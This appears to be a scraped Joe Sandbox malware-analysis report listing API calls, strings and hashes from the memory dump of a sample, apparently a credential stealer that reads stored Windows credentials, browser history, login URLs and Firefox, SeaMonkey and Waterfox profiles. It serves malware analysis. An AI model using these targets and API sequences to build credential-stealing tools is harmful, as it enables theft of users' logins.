                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                                      • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: C:\Windows\system32
                                                                                                                                                                                                                                      • API String ID: 669240632-2896066436
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 697348961-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                                      • API String ID: 4039892925-11920434
                                                                                                                                                                                                                                      • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                                      • API String ID: 4039892925-2068335096
                                                                                                                                                                                                                                      • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                                      • API String ID: 4039892925-3369679110
                                                                                                                                                                                                                                      • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                      • String ID: $0.@
                                                                                                                                                                                                                                      • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                      • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2941347001-0
                                                                                                                                                                                                                                      • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                                      • API String ID: 1534475566-1174173950
                                                                                                                                                                                                                                      • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                      • API String ID: 71295984-2036018995
